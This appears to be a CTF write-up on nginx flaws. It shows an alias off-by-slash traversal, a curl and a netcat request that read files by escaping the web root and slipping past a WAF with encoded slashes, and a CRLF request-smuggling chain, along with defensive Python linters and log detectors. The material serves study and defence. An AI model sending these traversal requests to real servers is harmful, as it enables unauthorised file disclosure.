NGINX Alias To Path Traversal
| Field | Value |
|---|---|
| Event Name | PWNME CTF 2025 |
| GitHub URL | - |
| Challenge Name | Hack the bot 2 |
Attachments
References
```nginx
events {}
user root;
http {
    server {
        listen 80;
        location / {
            proxy_pass http://127.0.0.1:5000;
        }
        # prefix without trailing slash, alias with one: the "off-by-slash" pattern
        location /logs {
            autoindex off;
            alias /tmp/bot_folder/logs/;
            try_files $uri $uri/ =404;
        }
    }
}
```
Because the `location /logs` prefix has no trailing slash while the `alias` does, a request for `/logs../` is rewritten to `/tmp/bot_folder/logs/../`, which steps out of the aliased directory. `--path-as-is` stops curl from normalising the `..` away before sending:

```bash
curl --path-as-is "https://hackthebot2-100459c43a199c0f.deploy.phreaks.fr/logs../browser_cache/DevToolsActivePort"
```
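Added example, not from the original write-up: a small Python script that shows how nginx resolves an `alias` when the `location` prefix lacks a trailing slash, and lints a config snippet for that pattern. The two config snippets are constructed to mirror the challenge config above, and the checker is a regex scan rather than a full nginx parser (it only handles plain prefix locations, not `=`/`~` forms).

```python
"""Resolve alias paths the way nginx does and flag off-by-slash alias blocks."""
import posixpath
import re

# Constructed sample: the vulnerable shape (prefix '/logs', alias ends in '/').
VULN_CONF = """
location /logs {
    autoindex off;
    alias /tmp/bot_folder/logs/;
    try_files $uri $uri/ =404;
}
"""

# Constructed sample: the fix, a trailing slash on the prefix as well.
FIXED_CONF = """
location /logs/ {
    autoindex off;
    alias /tmp/bot_folder/logs/;
    try_files $uri $uri/ =404;
}
"""


def resolve_alias(location: str, alias: str, request_path: str):
    """Return the filesystem path nginx opens for request_path, or None if the
    location prefix does not match.  nginx replaces the matched prefix with the
    alias string verbatim, so '/logs' + '../x' becomes alias + '../x'."""
    if not request_path.startswith(location):
        return None
    tail = request_path[len(location):]
    return posixpath.normpath(alias + tail)


# Plain prefix locations only; bodies are assumed to contain no nested braces.
LOCATION_RE = re.compile(r'location\s+(/\S*?)\s*\{([^}]*)\}')
ALIAS_RE = re.compile(r'\balias\s+(\S+?)\s*;')


def find_alias_traversal(conf: str):
    """Return (location, alias) pairs where the prefix has no trailing slash
    but the alias does: the combination that lets '/prefix../' escape."""
    findings = []
    for m in LOCATION_RE.finditer(conf):
        loc, body = m.group(1), m.group(2)
        a = ALIAS_RE.search(body)
        if a and not loc.endswith('/') and a.group(1).endswith('/'):
            findings.append((loc, a.group(1)))
    return findings


if __name__ == "__main__":
    print(resolve_alias('/logs', '/tmp/bot_folder/logs/',
                        '/logs../browser_cache/DevToolsActivePort'))
    print("vulnerable:", find_alias_traversal(VULN_CONF))
    print("fixed:", find_alias_traversal(FIXED_CONF))
```

The fix the checker encodes is the usual one: give the `location` prefix the same trailing slash as the `alias` (or use `root` instead of `alias`), so the `..` in `/logs../` can no longer be matched as part of the prefix.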
In nginx you can also use encoded (`%2f`) and repeated slashes in the path to get past a WAF that only pattern-matches the raw request line for LFI / traversal sequences:

```bash
echo -e "GET /%2f%2f/%2f%2f/%2f%2f/%2f%2f/%2f%2f/../../../../../../opt/flag.txt HTTP/1.1\r\nHost: centvps.centaurushook.xyz\r\n\r\n" | nc centvps.centaurushook.xyz 80
```
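Added example, not part of the original notes: a Python detector that decodes request paths from access-log lines before checking them, so traversal attempts built from `%2f`-encoded or repeated slashes trigger the same rule as a plain `../` or the `/logs../` form. The log lines are constructed for the example and follow nginx's default `combined` format.

```python
"""Flag traversal attempts in nginx access logs after percent-decoding the path."""
import re
from urllib.parse import unquote

# Constructed sample lines (nginx "combined" log format).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2025:10:00:01 +0000] "GET /logs/access.log HTTP/1.1" 200 512 "-" "curl/8.5"
10.0.0.5 - - [01/Mar/2025:10:00:02 +0000] "GET /logs../browser_cache/DevToolsActivePort HTTP/1.1" 200 64 "-" "curl/8.5"
10.0.0.9 - - [01/Mar/2025:10:00:03 +0000] "GET /%2f%2f/%2f%2f/../../../../../../opt/flag.txt HTTP/1.1" 404 0 "-" "-"
10.0.0.7 - - [01/Mar/2025:10:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Pull method and path out of the quoted request line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def canonical(path: str) -> str:
    """Drop the query string and percent-decode twice (double encoding is a
    common evasion); the result is what the server actually resolves."""
    return unquote(unquote(path.split('?', 1)[0]))


def is_traversal(path: str) -> bool:
    """True if any decoded path segment is '..' or ends in '..' (the latter
    catches the alias off-by-slash form such as 'logs..')."""
    segments = canonical(path).split('/')
    return any(seg == '..' or seg.endswith('..') for seg in segments if seg)


def flag_traversal(log_text: str):
    """Return (client_ip, raw_path, decoded_path) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        raw = m.group('path')
        if is_traversal(raw):
            hits.append((line.split(' ', 1)[0], raw, canonical(raw)))
    return hits


if __name__ == "__main__":
    for ip, raw, decoded in flag_traversal(SAMPLE_LOG):
        print(f"{ip} {raw} -> {decoded}")
```

Matching on the decoded path is the point: a rule that looks for the literal string `../` in the raw URI sees `/%2f%2f/..` and `/logs../` differently from the server that later resolves them.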
nginx modules

nginx can load several dynamic modules; one worth knowing about is `ngx_http_xslt_filter_module.so`. In a stylesheet applied by that module, `disable-output-escaping="yes"` writes the text node out without escaping, so any markup it contains ends up verbatim in the response (PotluckCTF 2023 challenge).
nginx spaghetti

(1) Prototype pollution of `Accept-Charset` to inject a `Content-Length` header when downloading `recipe.json` from `/download/`.
(2) CRLF injection into the `/download/` request so that the `proxy_pass` connection to `download.socket` carries two requests.
=> `download.socket` returns two answers, and nginx returns both in one response because the overwritten `Content-Length` header covers them.
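Added example, not from the original write-up: two defensive checks against the chain sketched above. `check_header` refuses header names or values that would let a caller end a line inside the request a proxy builds (the CRLF step), and `count_framed_responses` walks a raw upstream byte stream by `Content-Length` and reports how many complete responses it holds, which is how a test harness can spot the "two answers in one connection" condition. The sample bytes are constructed.

```python
"""Reject CRLF in forwarded headers and count Content-Length-framed responses."""
import re

# RFC 7230 token characters allowed in a header name.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def check_header(name: str, value: str) -> None:
    """Raise ValueError if the pair cannot be serialised without creating a
    new header line or a new request inside the upstream connection."""
    if not TOKEN_RE.match(name):
        raise ValueError(f"bad header name: {name!r}")
    if any(ch in value for ch in "\r\n\0"):
        raise ValueError(f"control character in value of {name}")


def count_framed_responses(raw: bytes) -> int:
    """Frame each HTTP/1.1 response in raw by its Content-Length and return how
    many complete responses the buffer contains.  A partial trailing response
    or a response without Content-Length ends the scan."""
    count, pos = 0, 0
    while True:
        end = raw.find(b"\r\n\r\n", pos)
        if end == -1:
            return count
        head = raw[pos:end].decode("latin-1")
        m = re.search(r"(?im)^content-length:\s*(\d+)\s*$", head)
        if not m:
            return count
        body_end = end + 4 + int(m.group(1))
        if body_end > len(raw):
            return count
        count += 1
        pos = body_end


# Constructed samples: one well-formed response, and the same buffer with a
# second response glued on, as an upstream that answered twice would produce.
SAMPLE_ONE = b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"
SAMPLE_TWO = SAMPLE_ONE + b"HTTP/1.1 200 OK\r\nContent-Length: 3\r\n\r\nabc"


if __name__ == "__main__":
    print(count_framed_responses(SAMPLE_ONE), count_framed_responses(SAMPLE_TWO))
    try:
        check_header("Accept-Charset", "utf-8\r\nContent-Length: 0")
    except ValueError as exc:
        print("rejected:", exc)
```

A proxy that validates every header it forwards with something like `check_header` cannot be made to emit a second request line, and a harness that sees `count_framed_responses` return more than 1 on a single upstream reply has found a desync worth investigating.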
Make a CSP-less page in nginx

Arbitrary Parentheses-less XSS against strict CSP policies | by terjanq | Medium